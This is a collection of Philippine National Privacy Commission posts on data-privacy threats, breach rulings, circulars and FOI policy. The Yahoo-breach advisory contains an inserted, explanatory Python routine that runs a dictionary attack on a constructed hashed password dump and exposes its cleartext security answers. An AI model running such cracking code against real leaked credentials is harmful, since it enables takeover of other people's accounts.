Phishing and Pharming
Phishing and pharming are both widely used to gather enough personal information about a victim — full name, address, credit card information, usernames, and passwords — to steal their identity online. Phishers use e-mails, instant messaging, and even SMS to lure you into entering your personal information on a fake website, while pharmers tamper with the Domain Name System (DNS) records that direct users to a legitimate website (often a bank or e-commerce site) so that its users are redirected to a look-alike site run by the pharmers. Phishing scams are among the most common attacks on personal data privacy, as they use simple bait (like their homophone, fishing) to extract personal information. While pharming is less common, each successful attack can simultaneously affect thousands of victims.
Adware
Short for advertising-supported software, adware is a piece of programming that displays advertisements to generate profit. While some forms of adware are legal and may even be built into certain applications, others are illegal and are considered malware. These can take the form of pop-ups or windows that cannot be closed, or they can run other forms of malware through infected programs or websites. More covert forms of adware track your web habits, while more invasive forms may include key-loggers that record the passwords you type.
Spyware
As the name suggests, spyware is a kind of program that spies on you. It should not be confused with “tracking software,” such as that installed on corporate computers or by parents at home to monitor what their children do on the internet: spyware finds its way onto your computer without your knowledge or consent and then sends your information to people you do not know. Smartphones, in particular, are popular targets, as some forms of spyware can use your phone’s camera and microphone to monitor your location, listen in on your phone calls, or collect your personal information.
Ransomware
Ransomware is a type of malware that encrypts your files to hold them ransom, with attackers asking anywhere from a few thousand to millions of pesos to let you retrieve your files. These programs can get into your system through phishing scams or malicious websites, and ransomware attacks have become increasingly common, with the Philippines recording at least 17 attacks a day in 2015. The cost of these attacks tends to be much higher than the ransom demanded, as security breaches can have long-lasting effects.
-
Holy Week 2017 Advisory for all Data Protection Officers in Government (DPO1)
The National Privacy Commission would like to remind all Data Protection Officers to ensure the security of the personal data in their respective agencies’ care during the long weekend of Holy Week 2017 (13 to 16 April 2017). This is in order to prevent data breaches such as the one that occurred during the same period in 2016.
The minimal staffing during official holidays like the Holy Week makes data processing systems vulnerable not only to online data breaches but to physical security breaches as well. In this regard, please take the necessary precautions to safeguard personal data.
Among our suggested precautions are as follows:
- Place non-mission critical systems, especially those that contain or have access to personal data, offline.
- For systems that are kept offline, ensure that all system activities are recorded and the aforementioned logs are secure.
- Password-protect or encrypt files and databases on servers, desktop computers, and other devices.
- Conduct a backup of systems and databases.
- Discourage physical breaches by securing office premises adequately.
For your guidance and compliance.
National Privacy Commission
Compliance and Monitoring Division
-
Privacy Commission rallies support for data protection in government
The National Privacy Commission (NPC) has called on Data Protection Officers (DPOs) in the public sector to be proactive in carrying out their duty as watchdogs and advocates of the data privacy rights of Filipinos from within their respective organizations.
Speaking to government data protection professionals on Wednesday at DPO1: The 1st Data Protection Officers’ Assembly, Privacy Commissioner and Chairman Raymund Enriquez Liboro stressed the critical role of DPOs in government in safeguarding the individual’s fundamental right to data privacy, calling it an extension of the government’s mandate to protect its citizens.
“[For] the government to really do its job of protecting the people, it must also protect the people’s data. And that’s exactly why we are here today at DPO1 --- to get the government’s acts together in providing data protection. Being at the forefront of personal data protection, it is incumbent upon you as government DPOs, and the NPC, to get our acts together. Just like what it says in a famous 70’s slogan, Kung ‘di tayo kikilos, sino ang kikilos? Kung ‘di ngayon, kailan pa? (If we won’t act, then who else will? If not now, when?)” Liboro told the event participants.
DPOs from over two hundred government agencies gathered at the Land Bank Plaza in Malate, Manila for the half-day event, the first in a series of DPO assemblies organized by the NPC. To help DPOs quickly build proficiency in marshaling the compliance of their respective organizations, the NPC provided them with an easy-to-follow template called the Data Privacy Accountability and Compliance Framework. Designed to help new DPOs gain on-the-job proficiency, the framework recommends a programmed series of activities over 30, 60 and 90-day periods. If fully implemented, Liboro said, the framework could facilitate an organization’s compliance within three months.
Commissioner Liboro said data protection is everyone’s business, but for DPOs it is a crucial responsibility. In defending people’s data privacy, DPOs are expected to fight physical, technical and organizational threats to data security. Some of the things to watch out for by the government DPO are security threats related to employee negligence, bring your own device (BYOD), phishing, and spyware.
“In functioning as protector of people’s data, the DPO becomes an enabler of privacy rights. By your collective efforts, it is you DPOs, who make data protection a practical, day-to-day reality inside each of your organizations, on the ground-level,” Liboro told the DPO1 participants.
Tailor-fitted to the unique needs of government DPOs, the event was designed to provide them with access to self-learning resources, the DPO1 compliance tool kit, and the DPO1 web forum, among others.
During the event, the agency also launched its website, which caters not just to DPOs but to the general public, especially those who want to learn more about their data privacy rights and file complaints.
Through the series of DPO assemblies, the NPC wants to professionalize the DPO practice in the country to world-class standards. Since data protection issues vary across sectors and industries, however, the Commission decided on a targeted communication approach. After DPO1, the NPC shall prepare for the next round of DPO meets for other sectors such as banking and financial institutions, BPOs, academic institutions, and health care services.
About The Commission: The NPC is a regulatory and quasi-judicial body established in March 2016 by virtue of RA 10173, otherwise known as the Data Privacy Act of 2012. Headed by one commissioner and two deputy commissioners, the agency is mandated to uphold the right to data privacy and ensure the free flow of information, with a view to promoting economic growth and innovation.
-
Privacy Commission recommends criminal prosecution of Bautista over “Comeleak”
The National Privacy Commission (NPC) has found that the Commission on Elections (COMELEC) violated the Data Privacy Act of 2012 and has recommended the criminal prosecution of Chairman J. Andres D. Bautista for the data breach that occurred between 20 and 27 March last year.
In its decision dated December 28, 2016 on NPC Case No. 16-001, the NPC underscored Bautista’s “lack of appreciation” of the principle that data protection is more than just the implementation of security measures. “Data privacy is more than the deployment of technical security; it also includes the implementation of physical and organizational measures, as well as regular review, evaluation, and updating of COMELEC’s privacy and security policies and practices,” the decision reads.
The NPC said the COMELEC “violated Sections 11, 20 and 21 of the Republic Act No. 10173” in the discharge of the agency’s duty as “personal information controller.” The document, meanwhile, found Chairman Bautista to have “violated the provisions of Section 11, 20, 21 and 22 in relation to Section 26” of the same law.
Section 26 of the Data Privacy Act, which penalizes access to sensitive personal information due to negligence, imposes imprisonment of 3 to 6 years and a fine of P500,000 to P4,000,000. Meanwhile, Section 36 provides additional penalties when the offender is a public officer, consisting of disqualification from public office for a period equivalent to double the term of the criminal penalty.
“The personal data in the breach is contained in several databases kept in the website: (a) the voter database in the Precinct Finder web application, containing 75,302,683 records; (b) the voter database in the Post Finder web application, which contains 1,376,067 records; (c) the iRehistro registration database, with 139,301 records; (d) the firearms ban database, containing 896,992 personal data records and 20,485 records of firearms serial numbers; and (e) the COMELEC personnel database, containing records of 1,267 COMELEC personnel,” the document reads, making the incident the worst recorded breach on a government-held personal database in the world, based on sheer volume.
Further illustrating the breadth of the breach, the NPC decision also gave a rundown of what types of compromised sensitive personal information were contained in COMELEC’s two web-based applications.
“The voter database in the Precinct Finder application contained each voter’s complete name, date of birth, gender, civil status, address, precinct number, birthplace, disability, voter identification number, voter registration record number, reason for deletion/deactivation, registration date, and update time.”
“The voter database in the Post Finder application contained information on each voter’s verified name, date of birth, gender, civil status, post of registration, passport information, with number and expiry date, taxpayer identification number, e-mail address, mailing address, spouse’s name, the complete names of the voter’s mother and father, the voter’s addresses in the Philippines and abroad, post or country of registration, old registration information, Philippine representative’s complete name, citizenship, registration assistor, profession, sector, height and weight, identifying marks, biometrics description, voting history, mode of voting, and other textual reference information for the voter registration system,” the decision further reads, depicting how much personal data are now most likely in the hands of criminal elements as a result of the COMELEC data breach.
Referring to Bautista, the NPC decision reads, “the willful and intentional disregard of his duties as head of agency, which he should know or ought to know, is tantamount to gross negligence. The lack of a clear data governance policy, particularly in collecting and further processing of personal data, unnecessarily exposed personal and sensitive information of millions of Filipinos to unlawful access.
“A head of agency making his acts depend on the recommendations of the Executive Director or the Information Technology Department amplifies the want of even slight care. The duty to obey the law should begin at the top and should not be frustrated simply because no employee recommended such action,” the NPC decision further reads.
As corrective measures, the NPC has ordered the COMELEC and Chairman Bautista to do the following:
- Appoint a Data Protection Officer within one month of receipt of the decision.
- Conduct an agency-wide Privacy Impact Assessment within two months.
- Create a Privacy Management Program and a Breach Management Procedure within three months.
- Within six months of receipt of the decision, implement organizational, physical and technical security measures in compliance with the Implementing Rules and Regulations of the Data Privacy Act and the provisions of NPC Circular No. 16-01, on Security of Personal Data in Government Agencies.
The NPC has also recommended to the Secretary of Justice “further investigation for possible prosecution” under the Cybercrime Prevention Act, having found that one of the computers used in the COMELEC data breach had an IP address registered with the National Bureau of Investigation (NBI).
About the NPC: The National Privacy Commission is a regulatory and quasi-judicial body created in March 2012 by virtue of RA 10173, otherwise known as the Data Privacy Act of 2012. Headed by one commissioner and two deputy commissioners, the agency is mandated to uphold the right to data privacy and ensure the free flow of information, with a view to promoting economic growth and innovation.
Contact Person: Atty. Rashy Rellosa – [email protected]
###
-
PH Privacy Commission gets international accreditation
PH National Privacy Commission approved as full member of the International Conference of Data Protection and Privacy Commissioners (ICDPPC). Out of 12 data privacy authorities from as many countries that applied for membership this year, the Philippines was one of only five approved for full membership, meeting the ICDPPC’s stringent standards for data protection and privacy. In the photo are (from left to right): Privacy Commissioner Raymund Enriquez Liboro (Philippines); Director General Patricia Kosseim of the Office of the Privacy Commissioner, Canada; Mr. John Edwards, Privacy Commissioner of New Zealand and Chairman of the ICDPPC Executive Committee; and Deputy Commissioner Dondi Mapa (Philippines) at a recent ICDPPC event held in Marrakech, Morocco.
The Philippines’ newly formed data protection and privacy authority, the National Privacy Commission (NPC), has received international recognition for its data protection regime from several notable international authorities. The NPC was formed on March 7, 2016.
The National Privacy Commission (NPC) received its accreditation as a member of the organization from the International Conference of Data Protection and Privacy Commissioners (ICDPPC). The accreditation from ICDPPC signifies that a country’s Data Protection agency meets stringent standards. Only 5 out of the 12 applications were approved by the ICDPPC Executive Committee this year. The ICDPPC has been the premier global forum for data protection authorities for 40 years, providing global leadership in data protection and privacy by connecting the efforts of over 110 privacy and data protection authorities from around the world.
NPC Commissioner Raymund E. Liboro was pleased with the recognition of the Commission’s efforts to upgrade the standards of privacy and data protection in the country. “Admission to the ICDPPC augurs well for the Philippines. It recognizes that we are committed to international standards in protecting personal data and privacy in the country, and that the Commission is viewed as independent and vested with the authority to do so,” Commissioner Liboro said.
Earlier last month, the Hogan Lovells Chronicle of Data Protection published an article on its website on the release of the Implementing Rules and Regulations (IRR) of the Data Privacy Act of 2012 (R.A. 10173). The article noted that “the IRRs represent a significant development in data privacy regulation in the Philippines, and will affect multi-national businesses that use or provide services in or from the Philippines, as well as local vendors with data processing facilities in the Philippines. It is fair to say that the IRRs set one of the higher bars for compliance standards in the Asia-Pacific region.”
This is good news for the Information Technology – Business Process Management (IT-BPM) industry, as it reinforces the Philippines’ reputation as an ideal IT-BPM destination. Benedict Hernandez of the Information Technology and Business Process Association of the Philippines (IBPAP) says more companies can be expected to prefer the Philippines over other countries, given that its data privacy standards meet international standards.
About the National Privacy Commission - The National Privacy Commission is the country’s privacy watchdog; an independent body mandated to administer and implement the Data Privacy Act of 2012, and to monitor and ensure compliance of the country with international standards set for data protection.
Contact Person: Michelle Saquido - [email protected]
-
Government Open Data to Improve with Data Sharing Directives
The free flow of information within the government is expected to improve with the issuance of the National Privacy Commission’s (NPC) latest memorandum circular, NPC MC 16-02, on Data Sharing Agreements Involving Government Agencies.
This issuance from the NPC reinforces its mandate to support the free flow of information and safeguard the right to privacy of information. National Privacy Commissioner Raymund Enriquez Liboro said that the law was intended to strike a balance between the need for information freedom and data privacy as indispensable components of nation building. He further stated that “Freedom of Information is more than just access requests to government, it is about responsible data sharing. Open data will contribute significantly to improving government services and coming up with new ones, supporting innovation and growth.”
The Freedom of Information (FoI) Executive Order was recently issued by the government, and the privacy commission clarified that the Data Privacy Act (DPA) cannot be used as a shield against FoI. It pointed out that the DPA is for the protection of any personal data that may be contained in government records but is not relevant to the Freedom of Information request, particularly when it concerns private citizens.
The government is considered the largest collector and repository of personal data. E-governance initiatives and innovations in public services allow citizens to avail of these services online, eliminating the need to queue up or to fill out paper-based forms with personal data that the government already has.
The Data Sharing issuance requires personal information controllers (government agencies) to implement safeguards for data sharing. These include adhering to data privacy principles, entering into Data Sharing Agreements, reviewing technical security measures when allowing online access, and providing for the return, destruction or disposal of transferred personal data. Violation of the directives contained in the issuance may lead to sanctions.
About the National Privacy Commission - The National Privacy Commission is the country’s privacy watchdog; an independent body mandated to administer and implement the Data Privacy Act of 2012, and to monitor and ensure compliance of the country with international standards set for data protection.
Contact Person: Michelle Saquido - [email protected]
-
Stricter government handling of personal data ordered in Privacy Commission issuance
Personal data in the hands of government offices and all branches of government, including state-run schools and colleges, are expected to be made more secure with the issuance of the National Privacy Commission’s (NPC) first memorandum circular (#16-001) on the “Security of Personal Data in Government”. According to Commissioner Raymund E. Liboro, the circular is about “preventing and mitigating potential data breaches.” He added that “heightened awareness and setting the appropriate security measures will lower the risk of security incidents and breach.”
As part of its mandate to provide public services, the government holds personal data of its citizens, as well as of visitors from other countries. In fact, the government is considered to be the biggest repository and collector of personal data. With more services becoming available online and with the increasing prevalence of cybercrimes like identity theft and hacking, it is vital that the personal data of citizens be kept secure.
Among the obligations of government agencies contained in NPC Memorandum Circular 16-01 are the designation of a Data Protection Officer and the conduct of a Privacy Impact Assessment for processes that use personal data. The circular also obliges government agencies to create privacy policies, conduct regular training on privacy policies for their employees and contractors, and register data processing systems that process the personal data of at least one thousand (1,000) individuals. The circular likewise outlines rules on the storage, access, transfer, and disposal of personal data in government IT systems.
Compliance of government institutions with this latest issuance by the NPC means that there will be fewer incidents of personal data breach like the one that happened to COMELEC in March this year, wherein millions of voter records were compromised. “Lessons from the incident and consultations with government agencies themselves through the CIO Forum (a nationwide association of government CIOs) guided us in drafting the circular,” Liboro said.
Commissioner Liboro is confident that government institutions will be able to comply with the NPC’s memorandum circular. “The responsible processing of personal data is a vital component of e-government, which is a major thrust of the Duterte Administration. As more and more government records are digitized and services go online, we must make sure that citizens’ personal data is kept secure. It should be a top priority,” he added.
About the National Privacy Commission - The National Privacy Commission is the country’s privacy watchdog; an independent body mandated to administer and implement the Data Privacy Act of 2012, and to monitor and ensure compliance of the country with international standards set for data protection.
# # #
Contact Person: Michelle Saquido - [email protected]
PDF version: pr-privacy-gov-ph-stricter-government-handling-of-personal-data-ordered-in-privacy-commission-issuance
-
Privacy Commission Advisory on Yahoo Breach
The National Privacy Commission (NPC) would like to reiterate the recommendation of Yahoo and cybersecurity experts that Yahoo users change the passwords on their Yahoo accounts.
This follows the compromise of half a billion user accounts from Yahoo’s servers in 2014, which was only discovered and confirmed by Yahoo this week. Below is what was posted on Yahoo’s e-mail log-in page about the account security issue:
"We have confirmed, based on a recent investigation, that a copy of certain user account information was stolen from our network in late 2014 by what we believe is a state-sponsored actor. The account information may have included names, email addresses, telephone numbers, dates of birth, hashed passwords (the vast majority with bcrypt) and, in some cases, encrypted or unencrypted security questions and answers."
Besides changing their Yahoo log-in credentials, the NPC also recommends that Yahoo users change the log-in credentials of other online accounts where they may have used their Yahoo email for account verification or password recovery. The security questions on Yahoo may also have been compromised, and answers that were stored unencrypted are usable by whoever holds the stolen data without any further effort; users should change their security questions and answers, or disable that feature, and do the same on any other site where they gave the same answers. The NPC also recommends activating two-step verification (two-factor authentication), which uses the phone number you provided to verify your identity when you sign in.
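The advisory above asks users to change passwords even though Yahoo reports that most stolen passwords were bcrypt-hashed, and to treat leaked security answers as burnt. The following is an added example, not part of the NPC’s advisory, that shows the attacker’s side of that reasoning on a constructed two-account dump: a slow, salted hash raises the cost of each guess but does not rescue a weak password from a short wordlist, while an answer that was stored in the clear needs no cracking at all. PBKDF2-HMAC-SHA256 from the standard library stands in for bcrypt (an assumption; the property that matters, a deliberately slow salted hash, is shared). The e-mail addresses, passwords, security answers and wordlist are all constructed.

```python
from __future__ import annotations

import hashlib
import hmac
import os

# Stand-in for bcrypt (assumption: the third-party bcrypt package is not
# available here). Like bcrypt, PBKDF2 makes every guess cost the attacker a
# deliberately slow, salted computation.
ITERATIONS = 50_000


def hash_password(password: str, salt: bytes) -> bytes:
    """Slow, salted hash of a password (bcrypt stand-in)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)


def verify_password(guess: str, salt: bytes, stored: bytes) -> bool:
    """Constant-time comparison of a candidate password against a stored hash."""
    return hmac.compare_digest(hash_password(guess, salt), stored)


def build_sample_dump() -> list[dict]:
    """Constructed rows modelled on Yahoo's description of the stolen data:
    e-mail, hashed password, and a security question whose answer was stored
    unencrypted. Nothing here is real account data."""
    rows = []
    for email, password, question, answer in [
        ("ana@example.com", "yahoo2014", "Mother's maiden name?", "Reyes"),
        ("ben@example.com", "correct horse battery staple kettle", "First pet?", "Bantay"),
    ]:
        salt = os.urandom(16)
        rows.append({
            "email": email,
            "salt": salt,
            "password_hash": hash_password(password, salt),
            "security_question": question,
            "security_answer": answer,  # in the clear, as reported for some accounts
        })
    return rows


# Constructed attacker wordlist: common passwords plus obvious site- and
# year-specific variants, the kind of list run first against any dump.
WORDLIST = ["123456", "password", "qwerty", "iloveyou", "letmein",
            "yahoo", "yahoo2013", "yahoo2014", "welcome1", "abc123"]


def offline_guess(row: dict, wordlist: list[str]) -> tuple[str | None, int]:
    """Dictionary attack on one row. Returns (recovered password or None, guesses made)."""
    for count, guess in enumerate(wordlist, start=1):
        if verify_password(guess, row["salt"], row["password_hash"]):
            return guess, count
    return None, len(wordlist)


def assess_dump(rows: list[dict], wordlist: list[str]) -> dict[str, dict]:
    """What an attacker holding the dump learns about each account."""
    report = {}
    for row in rows:
        cracked, guesses = offline_guess(row, wordlist)
        report[row["email"]] = {
            "password_recovered": cracked,
            "guesses_needed": guesses,
            # A cleartext answer is usable at once, on Yahoo and on any other
            # site where the user gave the same answer.
            "security_answer_exposed": row["security_answer"],
        }
    return report


if __name__ == "__main__":
    for email, finding in assess_dump(build_sample_dump(), WORDLIST).items():
        print(email, finding)
```

The first account falls on the eighth guess regardless of how slow the hash is, which is why the advice is to change the password rather than rely on the hashing; the long passphrase survives the wordlist, but its security answer is exposed just the same. At real scale the attacker runs the same loop over half a billion rows, so the slow hash only buys time.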
According to Privacy Commissioner Raymund Enriquez Liboro, “A compromised email account can be an avenue for a hacker to gain access to other personal online accounts of an individual, from social media sites to on-line payment portals. That is why it is important to maintain good password hygiene, use pass phrases with numbers or special characters instead of single words, take note of log-in attempts into your account/s that weren’t initiated by you, and change your password/s two to three times a year, or as many times as you change your toothbrush.”
It was revealed at a Microsoft Cybersecurity Summit for government agencies that it takes an average of 502 days for system administrators to detect a security breach.
About the National Privacy Commission - The National Privacy Commission is an independent body mandated to administer and implement the Data Privacy Act of 2012, and to monitor and ensure compliance of the country with international standards set for data protection.
-
Privacy Act IRR released – NPC to educate public about privacy
Photo 1: (From left to right) Deputy Privacy Commissioner Dondi Mapa, Deputy Privacy Commissioner Ivy Patdu, and Privacy Commissioner and Chairman Raymund E. Liboro listen to inputs from health information and research stakeholders at a public consultation on R.A. 10173’s Implementing Rules and Regulations / Photo courtesy of Ramon Duremdes Jr.
The Implementing Rules and Regulations (IRR) of Republic Act 10173, the Data Privacy Act (DPA) of 2012, were officially submitted by the National Privacy Commission (NPC) to the Presidential Communications Office (PCO) for publication in the Official Gazette, after several months of nationwide public consultations with various stakeholders. The IRR will take effect fifteen (15) days after publication.
The civil society organization Foundation for Media Alternatives (FMA) was instrumental in organizing public consultations on the Implementing Rules. According to FMA Director Alan Alegre, “The FMA is pleased with the spirit of inclusive participation of stakeholders in the development of the DPA’s IRR. Kudos to all stakeholders who participated in the public consultations, submitted comments online and offline, and produced position papers.”
Personal Information Controllers and other stakeholders participated in five public consultations and several meetings with the NPC. These stakeholders included representatives from banks, retail, education, research, health informatics, civil society, business process management, migrant sectors, and government organizations. Among the organizations that helped organize public consultations were the Philippine Computer Society, the UP Office of the Vice Chancellor for Research and Development (OVCRD), the Department of Health, the Philippine Council for Health Research and Development, Ateneo de Davao University, UP-PGH, the National Telehealth Center and the Foundation for Media Alternatives (FMA).
In its first year of operations, the NPC will focus on public information campaigns aimed at educating the public and organizations on the importance of data privacy.
According to Privacy Commissioner Raymund Liboro, “With the prevalent use of personal data in access devices, social media, and smartphone apps, as well as in the delivery of basic services, it is extremely important that the public and organizations be made aware of the need to responsibly handle personal information.”
“The IRR was made with the citizen’s protection and the country’s progress in mind,” emphasized Commissioner Liboro. “Personal data is an important part of your personal assets and should be guarded. Collectively, they become a national asset too.”
The Data Privacy Act applies in general to any person or organization, whether from the government or private sector, that is involved in the collection, processing and any further use of personal data. Personal data is any information that may identify a person, such as names, identification numbers, and personal circumstances. It may involve sensitive information such as contents of a medical record, which a person normally does not intend to disclose to the public.
According to Chairman Liboro, “Everyone must be aware of how to secure them from threats. The Data Privacy Act was enacted to build trust on the country’s ICT systems. To make sure every Filipino benefits from ICT and not to fall victims to data use negligence and internet abuse.”
The National Privacy Commission hopes to get the full cooperation of industry, government, civil society groups and other stakeholders in the conduct of its public information campaign and other activities.
Deputy Commissioner Ivy Patdu said, “To truly embrace a culture of privacy requires multi-sectoral coordination. The Commission has a big job ahead and the support and cooperation of various industries and Government will go a long way in protecting personal data.”
She adds, “Privacy is a fundamental human right. Promoting the free flow of information should not be seen as incompatible with upholding the right to information privacy. We just need to realize that the benefits gained from the use of personal data come with a duty of respecting the rights of data subjects.”
-
27 July 2016 version of the Proposed IRR
For the upcoming public consultation in Cebu on July 28, 2016, and for those interested in seeing the latest version of the proposed implementing rules and regulations (IRR) of the Data Privacy Act of 2012 (R.A. 10173), you can download the copy through this link: IRR Version 072716.pdf
-
Data Privacy Act. IRR Public Consultation - Cebu, 28 July 2016
This might be your last chance for a face-to-face public consultation on the IRR. This one will happen in Cebu. For those who can’t make it, feel free to send us an email at [email protected]
Register for the public consultation here: http://bit.ly/2acM0lc
Access the draft IRR here: http://www.gov.ph/2016/06/20/irr-data-privacy-act-2012/
Access R.A. 10173, the Data Privacy Act of 2012, here: http://www.gov.ph/2012/08/15/republic-act-no-10173/
For more information, contact the Foundation for Media Alternatives at [email protected] or +632 435-6684
-
National Privacy Commission Position on FOI EO
The National Privacy Commission lauds the signing of the Executive Order on Freedom of Information as an important step towards greater transparency and people’s participation in government. The right to information on matters of public concern is a fundamental right provided in the Constitution, and the right to privacy must always be balanced with the right of the people to be provided information on matters that affect their lives. The Executive Order was well written to observe these two fundamental rights.
Freedom of information is emphasized in both the Data Privacy Act (RA 10173) and its proposed Implementing Rules and Regulations. We affirm that the Data Privacy Act should not be used to restrict access to information that falls within matters of public concern. In particular, the Data Privacy Act does not apply to information about government officers and employees relating to their functions and positions, to personal data relating to government contracts, or to discretionary benefits given by government.
A government official who abuses his position or takes undue advantage of his functions for personal benefit will not be able to use the Data Privacy Act to restrict access of the people to information.
The protection of privacy is emphasized in Section 7 of the FOI EO. This is not intended to shield government officials. Rather, it protects any personal data contained in government records that is not relevant to the freedom of information request, particularly when it concerns private citizens.
For example, it is easy to imagine a request for public records from PhilHealth (Philippine Health Insurance Corporation) regarding its operations, including the contracts it entered into, but this does not mean that the names and diseases of patients should be disclosed or published to anyone requesting access. In the same way, an official or employee of the government with access to personal data does not have the right or the authority to disclose it to just anyone. By law, he or she is mandated to protect personal information from unauthorized access or breach in order to protect the privacy of citizens.
As a further example, public officers and employees are required by law to respect the privacy of victims of violence against women and their children, and records of these cases are confidential. Section 7 should therefore not be viewed as restricting the freedom of information upheld by the Executive Order, which defines information and public records broadly to include all government records, even those containing personal data of citizens. Section 7 is a recognition of the responsibility of government to protect personal data under its custody, and gives due regard to the equally important right to privacy.
The Executive Order of President Rodrigo R. Duterte makes a public declaration and a commitment that Filipinos shall have access to information, official and public records, and documents being held by the government. The National Privacy Commission supports this declaration. If only to emphasize, the Data Privacy Act shall not be used to restrict access to information that fall within matters of public concern. Freedom of information is not incompatible with the right to privacy.
-
Data Privacy Act Cannot Be Used As Shield Against FOI
The Data Privacy Act of 2012 cannot be used by government officials as a shield against the Freedom of Information Executive Order issued by President Duterte last week, the National Privacy Commission said in a position paper, in reaction to concerns that the Act would be used by government officials to deny access to information.
In the position paper, the Commission said that “A government official who abuses his position or takes undue advantage of his functions for personal benefit will not be able to use the Data Privacy Act to restrict access of the people to information.”
It added that Section 7 of the FOI Executive Order, on data privacy, “is not intended to shield government officials” but is “for the protection of any personal data that may be contained in government records that is not relevant to the freedom of information request, particularly when it affects private citizens.”
Section 7 should not be viewed as restricting the freedom of information upheld by the Executive Order, which defines information and public records broadly to include all government records, even those containing personal data of citizens. Section 7 is a recognition of the responsibility of government to protect personal data under its custody, and gives due regard to the equally important right to privacy.
According to Privacy Commissioner Raymund Liboro, “We laud the signing of the Executive Order on the Freedom of Information as an important step towards greater transparency and people’s participation in government. The right to information on matters of public concern is a fundamental right provided in the Constitution and the right to privacy must always be balanced with the right of the people to be provided information on matters that affect their lives. The Executive Order was well-written to observe these two fundamental rights.”
About the National Privacy Commission - The National Privacy Commission is an independent body mandated to administer and implement the Data Privacy Act of 2012, and to monitor and ensure compliance of the country with international standards set for data protection.
# # #
-
Invitation to Comment: Proposed Implementing Rules and Regulations of The Data Privacy Act
The Data Privacy Act of 2012 is the law for the protection of individual personal information in information and communications systems in both the government and the private sector. We recognize the need to support the free flow of information for national development, while safeguarding the fundamental right of every individual to privacy.
The National Privacy Commission is currently finalizing the implementing rules and regulations of the Data Privacy Act of 2012. We call on your participation through the submission of your views, position papers or recommendations on the proposed Rules. Please send us your comments through: [email protected]
It is our hope that we work together towards the common goal of promoting a privacy culture in our country, with due regard for the role of information and communication technology in nation building. You can download the latest draft version of the IRR here: updated draft July 12 2016